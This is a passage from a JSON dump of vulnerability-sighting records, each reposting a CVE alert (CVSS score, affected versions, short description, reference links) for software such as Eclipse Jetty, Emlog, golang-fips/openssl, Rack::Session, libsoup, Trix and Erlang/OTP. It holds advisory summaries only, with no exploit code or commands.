"a55c7e3d-b5f3-4bd9-9919-0d144a9bb145", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-889J-63JV-QHR8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15578", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-1948\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: In Eclipse Jetty versions 12.0.0 to 12.0.16 included, an HTTP/2 client can specify a very large value for the HTTP/2 settings parameter SETTINGS_MAX_HEADER_LIST_SIZE.\nThe Jetty HTTP/2 server does not perform validation on this setting, and tries to allocate a ByteBuffer of the specified capacity to encode HTTP responses, likely resulting in OutOfMemoryError being thrown, or even the JVM process exiting.\n\ud83d\udccf Published: 2025-05-08T17:48:40.831Z\n\ud83d\udccf Modified: 2025-05-08T17:48:40.831Z\n\ud83d\udd17 References:\n1. https://gitlab.eclipse.org/security/cve-assignement/-/issues/56\n2. https://github.com/jetty/jetty.project/security/advisories/GHSA-889j-63jv-qhr8", "creation_timestamp": "2025-05-08T18:24:21.000000Z"}, {"uuid": "0537ec2b-7b82-4cde-84a9-03d547d3d382", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4MCJ-8GVH-P753", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/16546", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47787\n\ud83d\udd25 CVSS Score: 8.9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: Emlog is an open source website building system. Emlog Pro prior to version 2.5.10 contains a file upload vulnerability. The store.php component contains a critical security flaw where it fails to properly validate the contents of remotely downloaded ZIP plugin files. This insufficient validation allows attackers to execute arbitrary code on the vulnerable system. Version 2.5.10 contains a patch for the issue.\n\ud83d\udccf Published: 2025-05-15T19:27:03.663Z\n\ud83d\udccf Modified: 2025-05-15T19:27:03.663Z\n\ud83d\udd17 References:\n1. https://github.com/emlog/emlog/security/advisories/GHSA-4mcj-8gvh-p753\n2. https://github.com/emlog/emlog/commit/691c13e90df2fb35e120f4e0735078bad018eed7", "creation_timestamp": "2025-05-15T19:33:06.000000Z"}, {"uuid": "ead2b531-acce-4632-9a5e-1b1fc45514b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CP2J-RWH4-R46F", "type": "published-proof-of-concept", "source": "Telegram/veDSMFN7ecyhltWdKUwpcYAyE-ogEw-qfchv6YBZH7Zn1oc", "content": "", "creation_timestamp": "2026-04-18T05:18:34.000000Z"}, {"uuid": "01372dae-43c5-4182-abb5-04eac566f2b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q4RV-GQ96-W7C5", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15583", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-13009\n\ud83d\udd25 CVSS Score: 7.2 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: In Eclipse Jetty versions 9.4.0 to 9.4.56 a buffer can be incorrectly released when confronted with a gzip error when inflating a request\nbody. This can result in corrupted and/or inadvertent sharing of data between requests.\n\ud83d\udccf Published: 2025-05-08T17:29:31.380Z\n\ud83d\udccf Modified: 2025-05-08T17:29:31.380Z\n\ud83d\udd17 References:\n1. https://gitlab.eclipse.org/security/cve-assignement/-/issues/48\n2. https://github.com/jetty/jetty.project/security/advisories/GHSA-q4rv-gq96-w7c5", "creation_timestamp": "2025-05-08T18:24:29.000000Z"}, {"uuid": "461d9c0d-cc40-417a-b563-33671c547adf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:5258", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "3b398ad2-1c5d-4a60-9177-69fd62ce2380", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4502", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "fee9e221-9ac7-413a-b9a3-817a8c28c156", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2568", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "cdf966cd-f5bb-4a6a-92a1-1a77b146fa7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9J94-67JR-4CQJ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15607", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46336\n\ud83d\udd25 CVSS Score: 4.2 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N)\n\ud83d\udd39 Description: Rack::Session is a session management implementation for Rack. In versions starting from 2.0.0 to before 2.1.1, when using the Rack::Session::Pool middleware, and provided the attacker can acquire a session cookie (already a major issue), the session may be restored if the attacker can trigger a long running request (within that same session) adjacent to the user logging out, in order to retain illicit access even after a user has attempted to logout. This issue has been patched in version 2.1.1.\n\ud83d\udccf Published: 2025-05-08T19:26:01.638Z\n\ud83d\udccf Modified: 2025-05-08T20:18:38.555Z\n\ud83d\udd17 References:\n1. https://github.com/rack/rack-session/security/advisories/GHSA-9j94-67jr-4cqj\n2. https://github.com/rack/rack/security/advisories/GHSA-vpfw-47h7-xj4g\n3. https://github.com/rack/rack-session/commit/c28c4a8c1861d814e09f2ae48264ac4c40be2d3b", "creation_timestamp": "2025-05-08T20:23:47.000000Z"}, {"uuid": "fbee9c82-005f-49bc-b1cb-a5f8f88a0aee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:4560", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/15833", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32052\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L)\n\ud83d\udd39 Description: A flaw was found in libsoup. A vulnerability in the sniff_unknown() function may lead to heap buffer over-read.\n\ud83d\udccf Published: 2025-04-03T13:37:23.109Z\n\ud83d\udccf Modified: 2025-05-09T20:21:41.858Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:4440\n2. https://access.redhat.com/errata/RHSA-2025:4508\n3. https://access.redhat.com/errata/RHSA-2025:4560\n4. https://access.redhat.com/errata/RHSA-2025:4568\n5. https://access.redhat.com/security/cve/CVE-2025-32052\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2357069", "creation_timestamp": "2025-05-09T20:26:05.000000Z"}, {"uuid": "8a64fad4-e3ed-4f6d-8017-d0a35cee1f25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:4568", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/15833", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32052\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L)\n\ud83d\udd39 Description: A flaw was found in libsoup. A vulnerability in the sniff_unknown() function may lead to heap buffer over-read.\n\ud83d\udccf Published: 2025-04-03T13:37:23.109Z\n\ud83d\udccf Modified: 2025-05-09T20:21:41.858Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:4440\n2. https://access.redhat.com/errata/RHSA-2025:4508\n3. https://access.redhat.com/errata/RHSA-2025:4560\n4. https://access.redhat.com/errata/RHSA-2025:4568\n5. https://access.redhat.com/security/cve/CVE-2025-32052\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2357069", "creation_timestamp": "2025-05-09T20:26:05.000000Z"}, {"uuid": "82cca42f-f5c7-46d8-8a25-8b030b941b63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MCRW-746G-9Q8H", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15617", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46812\n\ud83d\udd25 CVSS Score: 2 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P)\n\ud83d\udd39 Description: Trix is a what-you-see-is-what-you-get rich text editor for everyday writing. Versions prior to 2.1.15 are vulnerable to XSS attacks when pasting malicious code. An attacker could trick a user to copy and paste malicious code that would execute arbitrary JavaScript code within the context of the user's session, potentially leading to unauthorized actions being performed or sensitive information being disclosed. This issue has been patched in version 2.1.15.\n\ud83d\udccf Published: 2025-05-08T19:27:22.573Z\n\ud83d\udccf Modified: 2025-05-08T20:00:42.604Z\n\ud83d\udd17 References:\n1. https://github.com/basecamp/trix/security/advisories/GHSA-mcrw-746g-9q8h\n2. https://github.com/basecamp/trix/commit/75226089646841b0f774d8b152e5ec27d2d9e191", "creation_timestamp": "2025-05-08T20:23:59.000000Z"}, {"uuid": "c95c8e75-b15b-42c7-9c14-d53a01d1ef2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VPFW-47H7-XJ4G", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15607", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46336\n\ud83d\udd25 CVSS Score: 4.2 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N)\n\ud83d\udd39 Description: Rack::Session is a session management implementation for Rack. In versions starting from 2.0.0 to before 2.1.1, when using the Rack::Session::Pool middleware, and provided the attacker can acquire a session cookie (already a major issue), the session may be restored if the attacker can trigger a long running request (within that same session) adjacent to the user logging out, in order to retain illicit access even after a user has attempted to logout. This issue has been patched in version 2.1.1.\n\ud83d\udccf Published: 2025-05-08T19:26:01.638Z\n\ud83d\udccf Modified: 2025-05-08T20:18:38.555Z\n\ud83d\udd17 References:\n1. https://github.com/rack/rack-session/security/advisories/GHSA-9j94-67jr-4cqj\n2. https://github.com/rack/rack/security/advisories/GHSA-vpfw-47h7-xj4g\n3. https://github.com/rack/rack-session/commit/c28c4a8c1861d814e09f2ae48264ac4c40be2d3b", "creation_timestamp": "2025-05-08T20:23:47.000000Z"}, {"uuid": "be301f38-b36f-48f4-ac64-cbf7d13bda0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2JRC-X8FQ-PRVC", "type": "published-proof-of-concept", "source": "Telegram/uiCSDEn_b8aQmWF7FrTZmjJQGi4eEk-7s_LrqhzwnkCLApk", "content": "", "creation_timestamp": "2026-04-18T03:16:44.000000Z"}, {"uuid": "431bc162-51c3-4fb1-9bec-dd2bd3d75953", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XJX3-GJH9-45FM", "type": "published-proof-of-concept", "source": "Telegram/uiCSDEn_b8aQmWF7FrTZmjJQGi4eEk-7s_LrqhzwnkCLApk", "content": "", "creation_timestamp": "2026-04-18T03:16:44.000000Z"}, {"uuid": "bd7fb0f4-4e11-466a-935a-5f6e87023c06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-934X-XQ38-HHQF", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/15613", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46712\n\ud83d\udd25 CVSS Score: 3.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\ud83d\udd39 Description: Erlang/OTP is a set of libraries for the Erlang programming language. In versions prior to OTP-27.3.4 (for OTP-27), OTP-26.2.5.12 (for OTP-26), and OTP-25.3.2.21 (for OTP-25), Erlang/OTP SSH fails to enforce strict KEX handshake hardening measures by allowing optional messages to be exchanged. This allows a Man-in-the-Middle attacker to inject these messages in a connection during the handshake. This issue has been patched in versions OTP-27.3.4 (for OTP-27), OTP-26.2.5.12 (for OTP-26), and OTP-25.3.2.21 (for OTP-25).\n\ud83d\udccf Published: 2025-05-08T19:26:27.563Z\n\ud83d\udccf Modified: 2025-05-08T20:03:27.225Z\n\ud83d\udd17 References:\n1. https://github.com/erlang/otp/security/advisories/GHSA-934x-xq38-hhqf\n2. https://github.com/erlang/otp/releases/tag/OTP-25.3.2.21\n3. https://github.com/erlang/otp/releases/tag/OTP-26.2.5.12\n4. https://github.com/erlang/otp/releases/tag/OTP-27.3.4", "creation_timestamp": "2025-05-08T20:23:54.000000Z"}, {"uuid": "c27e9625-57c6-4b0d-ad5b-8e83116dc02e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RG7M-6VH7-F4V2", "type": "published-proof-of-concept", "source": "Telegram/uiCSDEn_b8aQmWF7FrTZmjJQGi4eEk-7s_LrqhzwnkCLApk", "content": "", "creation_timestamp": "2026-04-18T03:16:44.000000Z"}, {"uuid": "ed1ba8f4-e2d1-4138-a80e-515d294f7954", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7R3F-9FWV-P43W", "type": "published-proof-of-concept", "source": "Telegram/uiCSDEn_b8aQmWF7FrTZmjJQGi4eEk-7s_LrqhzwnkCLApk", "content": "", "creation_timestamp": "2026-04-18T03:16:44.000000Z"}, {"uuid": "a96a32bf-c309-4ada-93e5-fac165860195", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-44WG-R34Q-HVFX", "type": "seen", "source": "Telegram/pg0pMMwJv5FTHbXxc3MO00N2B5ehQq9biiv2KNNNK0Va5Yk", "content": "", "creation_timestamp": "2026-04-18T03:16:49.000000Z"}, {"uuid": "6797a93b-8228-4cf3-a0ae-b2ae1c157938", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3P24-9X7V-7789", "type": "seen", "source": "Telegram/pg0pMMwJv5FTHbXxc3MO00N2B5ehQq9biiv2KNNNK0Va5Yk", "content": "", "creation_timestamp": "2026-04-18T03:16:49.000000Z"}, {"uuid": "d0cb1e61-3a03-4c4c-a79c-8af49eaefd9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-526V-VM72-4V64", "type": "published-proof-of-concept", "source": "Telegram/veDSMFN7ecyhltWdKUwpcYAyE-ogEw-qfchv6YBZH7Zn1oc", "content": "", "creation_timestamp": "2026-04-18T05:18:34.000000Z"}, {"uuid": "a6ba128a-4001-48b3-9df2-0b6ed6cd2ca0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:5634", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. 